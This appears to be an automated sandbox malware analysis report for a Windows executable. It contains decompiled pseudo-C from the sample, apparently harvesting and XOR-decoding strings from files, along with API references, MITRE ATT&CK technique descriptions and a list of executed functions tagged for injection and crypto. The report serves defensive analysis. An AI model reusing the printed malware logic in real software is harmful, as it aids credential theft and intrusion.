				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E00416745( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E004160D5(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E004119A1(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0041617D( &_v612);
						goto L31;
					}
					_v640 = E004110D6(0x622);
					E0040C9FD(0x91,  &_v588);
					E0040C9FD(0x92,  &_v628);
					E0040C9FD(0x93,  &_v620);
					E0040C9FD(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E00411106(_v640);
						E00411122(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E0040BC20();
							E0040BC20();
							E0040BC20();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E0040CA33(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E00411DF9(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E004114FA(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E0040BC20();
							_t157 = E00411785(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E0040CA33(0x90, _t171);
					_v648 = _t171;
					E004165E9( &_v524,  &_v648, _t177, 1, 5, E0040BC3A, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x0040bc40
0x0040bc5e
0x0040bebe
0x0040bec6
0x0040bec6
0x0040bc64
0x0040bc67
0x0040bcaa
0x0040bcad
0x0040bcb2
0x0040bcb7
0x0040bcb9
0x00000000
0x00000000
0x0040bcd0
0x0040bcd5
0x0040bcd9
0x0040bcdc
0x0040beb5
0x0040beb9
0x00000000
0x0040beb9
0x0040bcec
0x0040bcf9
0x0040bd07
0x0040bd15
0x0040bd23
0x0040bd28
0x0040bd2c
0x0040be9f
0x0040bea3
0x0040beb0
0x00000000
0x0040beb0
0x0040bd32
0x0040bd36
0x0040bd3a
0x0040bd46
0x0040bd46
0x0040bd4a
0x0040bd4e
0x0040bd52
0x00000000
0x00000000
0x0040bd62
0x0040bd74
0x0040bd84
0x0040bd94
0x0040bd96
0x0040bd9b
0x0040bd9d
0x00000000
0x00000000
0x0040bda3
0x0040bda8
0x00000000
0x00000000
0x0040bdae
0x0040bdb0
0x00000000
0x00000000
0x0040bdb6
0x0040bdbf
0x0040bdc4
0x0040bdc7
0x0040bdcb
0x0040bdd4
0x0040bddb
0x0040bde0
0x0040bde2
0x0040be0c
0x0040be0e
0x0040be0f
0x0040be13
0x0040be16
0x00000000
0x00000000
0x0040be1c
0x0040be1f
0x00000000
0x00000000
0x0040be21
0x0040be23
0x0040be25
0x00000000
0x00000000
0x0040be27
0x0040be29
0x0040be2f
0x0040be2f
0x0040be33
0x00000000
0x00000000
0x0040be35
0x0040be35
0x0040be37
0x0040be39
0x00000000
0x00000000
0x00000000
0x00000000
0x0040be3b
0x0040be3b
0x0040be3b
0x0040be3f
0x0040be40
0x0040be40
0x0040be46
0x0040be48
0x0040be4c
0x0040be50
0x0040be51
0x0040be56
0x0040be57
0x0040be5b
0x0040be5f
0x0040be65
0x0040be6f
0x0040be74
0x0040be77
0x0040be79
0x0040be7b
0x0040be81
0x0040be86
0x0040be88
0x0040be8a
0x0040be8a
0x0040be8a
0x0040be8a
0x0040be88
0x0040be79
0x00000000
0x0040be48
0x0040be2b
0x0040be2d
0x00000000
0x00000000
0x00000000
0x0040be2d
0x0040bde9
0x0040bded
0x0040bdfd
0x0040bdff
0x0040be02
0x00000000
0x00000000
0x0040be04
0x0040be0a
0x00000000
0x00000000
0x00000000
0x0040be8d
0x0040be8d
0x0040be95
0x0040be95
0x0040bd46
0x00000000
0x0040bc69
0x0040bc69
0x0040bc72
0x0040bc79
0x0040bc99
0x00000000
0x0040bc99

APIs

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040BD60
StrStrIA.SHLWAPI(?,?), ref: 0040BD72
StrStrIA.SHLWAPI(?,?), ref: 0040BD82
StrStrIA.SHLWAPI(?,?), ref: 0040BD94

Part of subcall function 004165E9: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
Part of subcall function 004165E9: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
Part of subcall function 004165E9: PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
Part of subcall function 004165E9: Sleep.KERNEL32(00000000,?,?), ref: 004166F6
Part of subcall function 004165E9: FindNextFileW.KERNEL32(?,?), ref: 00416724
Part of subcall function 004165E9: FindClose.KERNEL32(?), ref: 00416736

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 72af5f7acfc866ccc90672fae6265cf7eb00e94ca1a820a1f36c04653f9209d6
Instruction ID: 00657bf3aa9e71601cb84c5bec774a2fc10a527ec8ab6a54d6a56c263e9ad6ae
Opcode Fuzzy Hash: 72af5f7acfc866ccc90672fae6265cf7eb00e94ca1a820a1f36c04653f9209d6
Instruction Fuzzy Hash: 9B715B715083419FD721DF25C841A9BB7E5EF84704F00492EFA94A72E2D738D946CBDA

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report RFlc8JHObG

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: RFlc8JHObG.exe PID: 5988 Parent PID: 5904

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: RFlc8JHObG.exe PID: 5988 Parent PID: 5904 RFlc8JHObG.exeCOMMON

Executed Functions

Function 00406532, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 231
libraryloadermemoryCOMMON

Function 02457E13, Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 694
memoryCOMMONCrypto

Function 024590B3, Relevance: 14.0, Strings: 11, Instructions: 268
COMMONCrypto

Function 004145CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 02459A29, Relevance: 4.9, APIs: 3, Instructions: 391
memoryCOMMONCrypto

Function 024595E0, Relevance: 3.2, APIs: 2, Instructions: 250
libraryloaderCOMMONCrypto

Function 02442699, Relevance: 2.0, APIs: 1, Instructions: 472
memoryCOMMONCrypto

Function 02442209, Relevance: 1.8, APIs: 1, Instructions: 256
COMMONCrypto

Function 0244266E, Relevance: .3, Instructions: 317
COMMONCrypto

Function 00415552, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 004074B5, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Function 0245B1FE, Relevance: 1.3, APIs: 1, Instructions: 63
memoryCOMMON

Function 0040716E, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Function 00414CC6, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 004054D0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 00412A28, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 0040CC7E, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Function 004165E9, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 004127D2, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 0040E9BB, Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Function 004104D7, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198
COMMON

Function 0041652E, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 0040D61F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Function 00415819, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Function 0040E904, Relevance: 4.6, APIs: 3, Instructions: 62
nativethreadCOMMON

Function 00409D29, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Function 00411208, Relevance: 3.0, APIs: 2, Instructions: 15
timeCOMMON

Function 0040A448, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Function 004078CA, Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 00411230, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Function 0040ED74, Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Function 0245B0E3, Relevance: 1.3, Strings: 1, Instructions: 98
COMMONCrypto

Function 024413C7, Relevance: .5, Instructions: 492
COMMONCrypto

Function 0245AC60, Relevance: .4, Instructions: 382
COMMONCrypto

Function 02442F44, Relevance: .3, Instructions: 311
COMMONCrypto

Function 0040168B, Relevance: .2, Instructions: 236
COMMONCrypto

Function 02441000, Relevance: .2, Instructions: 193
COMMONCrypto

Function 02459F88, Relevance: .2, Instructions: 192
COMMONCrypto

Function 00413E5D, Relevance: .2, Instructions: 190
COMMONCrypto

Function 0245A9BA, Relevance: .1, Instructions: 123
COMMONCrypto

Function 024598C3, Relevance: .1, Instructions: 121
COMMONCrypto

Function 0245AB1C, Relevance: .1, Instructions: 107
COMMONCrypto

Function 004122B7, Relevance: .1, Instructions: 70
COMMONCrypto

Function 0245A912, Relevance: .1, Instructions: 64
COMMONCrypto

Function 004176A1, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Function 00417E1B, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Function 00408F03, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Function 004181E9, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Function 004197C3, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Function 00418086, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Function 0040641D, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85
fileCOMMON

Function 0040591C, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 194
COMMON

Function 00404CFC, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Function 00412DEE, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Function 0040EF97, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Function 004194A9, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Function 0040ADD9, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Function 004156FA, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Function 0040EAE4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Function 00418CBA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Function 0040FE43, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON